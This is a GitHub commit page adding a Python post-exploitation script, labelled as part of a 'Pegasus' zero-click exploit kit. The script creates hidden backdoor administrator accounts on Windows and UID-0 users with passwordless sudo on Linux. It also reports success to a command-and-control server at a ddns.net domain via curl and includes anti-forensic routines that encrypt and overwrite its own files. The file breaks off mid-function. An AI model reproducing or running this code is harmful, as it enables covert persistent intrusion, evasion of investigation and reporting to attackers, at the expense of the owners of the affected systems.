Skip to content

Commit 781e244

Browse files
Add files via upload
1 parent 968ef1e commit 781e244

File tree

1 file changed

+199
-0
lines changed

1 file changed

+199
-0
lines changed
Lines changed: 199 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,199 @@
1+
# /src/exploits/zero-click_exploits/pegasus/privilege_escalation/privilege_escalation.py
2+
3+
import os
4+
import sys
5+
import json
6+
import time
7+
import subprocess
8+
import hashlib
9+
import base64
10+
import secrets
11+
import string
12+
import ctypes
13+
from pathlib import Path
14+
from datetime import datetime
15+
16+
# --- Configuration ---
17+
# In a real deployment, this key would be provided by the C2 or derived from target info.
18+
# This key is used to encrypt the script's source code after execution.
19+
ENCRYPTION_KEY = hashlib.sha256(b'PegasusSAP_PrivEsc_Key_2026_V1').digest()
20+
21+
# C2 Configuration (optional, for reporting success)
22+
C2_DOMAIN = "zeroclickexploits.ddns.net"
23+
C2_PORT = 443
24+
C2_ENDPOINT = f"https://{C2_DOMAIN}:{C2_PORT}/api/v1/status"
25+
26+
# Backdoor Account Configuration
27+
# The username for the new backdoor account.
28+
BACKDOOR_USERNAME = "HelpAssistant"
29+
# A strong, randomly generated password will be created.
30+
BACKDOOR_PASSWORD = ''.join(secrets.choice(string.ascii_letters + string.digits + string.punctuation) for _ in range(16))
31+
32+
# --- Evasion and Anti-Forensics ---
33+
def _log_event(message, level='info'):
34+
"""Internal logger to prevent writing to disk."""
35+
timestamp = datetime.now().isoformat()
36+
print(f"[{timestamp}] [{level.upper()}] {message}")
37+
38+
def encrypt_file_aes_gcm(file_path, key):
39+
"""Encrypts a file using AES-256 in GCM mode."""
40+
try:
41+
from Crypto.Cipher import AES
42+
from Crypto.Random import get_random_bytes
43+
44+
nonce = get_random_bytes(12)
45+
cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
46+
47+
with open(file_path, 'rb') as f:
48+
plaintext_data = f.read()
49+
50+
ciphertext, auth_tag = cipher.encrypt_and_digest(plaintext_data)
51+
encrypted_data = nonce + auth_tag + ciphertext
52+
53+
encrypted_file_path = file_path.with_suffix(file_path.suffix + ".enc")
54+
with open(encrypted_file_path, 'wb') as f:
55+
f.write(encrypted_data)
56+
57+
secure_delete_file(file_path)
58+
return encrypted_file_path
59+
except ImportError:
60+
_log_event("PyCryptodome not found, cannot encrypt.", 'error')
61+
return None
62+
except Exception as e:
63+
_log_event(f"Encryption failed: {e}", 'error')
64+
return None
65+
66+
def secure_delete_file(file_path, passes=3):
67+
"""Securely deletes a file by overwriting it multiple times."""
68+
try:
69+
path = Path(file_path)
70+
if not path.exists():
71+
return
72+
with open(path, "ba+") as f:
73+
length = f.tell()
74+
for _ in range(passes):
75+
f.seek(0)
76+
f.write(os.urandom(length))
77+
path.unlink()
78+
except Exception as e:
79+
_log_event(f"Failed to securely delete {file_path}: {e}", 'error')
80+
81+
def report_status_to_c2(success, message):
82+
"""Sends a status report to the C2 server."""
83+
try:
84+
payload = {
85+
"type": "priv_esc_report",
86+
"timestamp": datetime.utcnow().isoformat() + "Z",
87+
"target_id": os.environ.get("TARGET_ID", "unknown"),
88+
"success": success,
89+
"message": message
90+
}
91+
92+
json_payload = json.dumps(payload)
93+
cmd = [
94+
"curl", "-k", "-s", "-X", "POST",
95+
"-H", "Content-Type: application/json",
96+
"-H", "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
97+
"-d", json_payload,
98+
"--connect-timeout", "10",
99+
"--max-time", "30",
100+
C2_ENDPOINT
101+
]
102+
103+
subprocess.run(cmd, capture_output=True, text=True, timeout=40)
104+
_log_event(f"Reported status to C2: {message}")
105+
except Exception as e:
106+
_log_event(f"Failed to report status to C2: {e}", 'error')
107+
108+
# --- Core Privilege Escalation Logic ---
109+
def is_admin_windows():
110+
"""Returns True if the script is running with administrative privileges on Windows."""
111+
try:
112+
return ctypes.windll.shell32.IsUserAnAdmin()
113+
except:
114+
return False
115+
116+
def create_hidden_admin_user_windows(username, password):
117+
"""Creates a new user, adds it to the Administrators group, and hides it from the login screen."""
118+
try:
119+
_log_event(f"Attempting to create hidden admin user: {username}")
120+
121+
# Command to create the user
122+
create_user_cmd = f"net user {username} {password} /add"
123+
# Command to add the user to the local Administrators group
124+
add_to_group_cmd = f"net localgroup Administrators {username} /add"
125+
# Command to hide the user from the login screen by setting its registry key
126+
hide_user_cmd = f'reg add "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList" /v {username} /t REG_DWORD /d 0 /f'
127+
128+
subprocess.run(create_user_cmd, shell=True, check=True, capture_output=True)
129+
_log_event(f"User '{username}' created successfully.")
130+
131+
subprocess.run(add_to_group_cmd, shell=True, check=True, capture_output=True)
132+
_log_event(f"User '{username}' added to Administrators group.")
133+
134+
subprocess.run(hide_user_cmd, shell=True, check=True, capture_output=True)
135+
_log_event(f"User '{username}' hidden from login screen.")
136+
137+
return True, f"Successfully created hidden admin user '{username}' with password '{password}'."
138+
except subprocess.CalledProcessError as e:
139+
error_msg = f"Failed to create admin user. Command failed with exit code {e.returncode}. Error: {e.stderr.decode().strip()}"
140+
_log_event(error_msg, 'error')
141+
return False, error_msg
142+
except Exception as e:
143+
error_msg = f"An unexpected error occurred: {e}"
144+
_log_event(error_msg, 'error')
145+
return False, error_msg
146+
147+
def create_root_user_linux(username, password):
148+
"""Creates a new user with a UID of 0 (root) and a passwordless sudo entry."""
149+
try:
150+
_log_event(f"Attempting to create root-equivalent user: {username}")
151+
152+
# Command to create the user with a home directory and shell
153+
create_user_cmd = f"useradd -m -s /bin/bash {username}"
154+
# Command to set the user's password
155+
set_password_cmd = f"echo '{username}:{password}' | chpasswd"
156+
# Command to change the user's UID to 0
157+
set_uid_cmd = f"usermod -o -u 0 {username}"
158+
# Command to add a passwordless sudoers file entry
159+
sudoers_cmd = f"echo '{username} ALL=(ALL:ALL) NOPASSWD:ALL' | sudo tee /etc/sudoers.d/{username}"
160+
161+
subprocess.run(create_user_cmd, shell=True, check=True, capture_output=True)
162+
_log_event(f"User '{username}' created.")
163+
164+
subprocess.run(set_password_cmd, shell=True, check=True, capture_output=True)
165+
_log_event(f"Password set for user '{username}'.")
166+
167+
subprocess.run(set_uid_cmd, shell=True, check=True, capture_output=True)
168+
_log_event(f"UID for user '{username}' set to 0.")
169+
170+
subprocess.run(sudoers_cmd, shell=True, check=True, capture_output=True)
171+
_log_event(f"Passwordless sudo entry added for user '{username}'.")
172+
173+
return True, f"Successfully created root-equivalent user '{username}' with password '{password}'."
174+
except subprocess.CalledProcessError as e:
175+
error_msg = f"Failed to create root user. Command failed with exit code {e.returncode}. Error: {e.stderr.decode().strip()}"
176+
_log_event(error_msg, 'error')
177+
return False, error_msg
178+
except Exception as e:
179+
error_msg = f"An unexpected error occurred: {e}"
180+
_log_event(error_msg, 'error')
181+
return False, error_msg
182+
183+
def escalate_privileges():
184+
"""Main function to escalate privileges based on the operating system."""
185+
if sys.platform == 'win32':
186+
if is_admin_windows():
187+
_log_event("Already running with administrative privileges. Creating backdoor user.")
188+
success, message = create_hidden_admin_user_windows(BACKDOOR_USERNAME, BACKDOOR_PASSWORD)
189+
else:
190+
_log_event("Not running as administrator. Attempting to relaunch with elevated privileges.")
191+
# This is a common technique to request UAC elevation.
192+
# The script will re-run itself with elevated rights.
193+
ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, " ".join(sys.argv), None, 1)
194+
# Exit the current non-elevated instance.
195+
# The elevated instance will perform the action.
196+
sys.exit(0)
197+
elif sys.platform.startswith('linux'):
198+
# On Linux, we assume the script is run as a user with sudo privileges.
199+
_log_event("Linux detected. Attempting to

0 commit comments

Comments
 (0)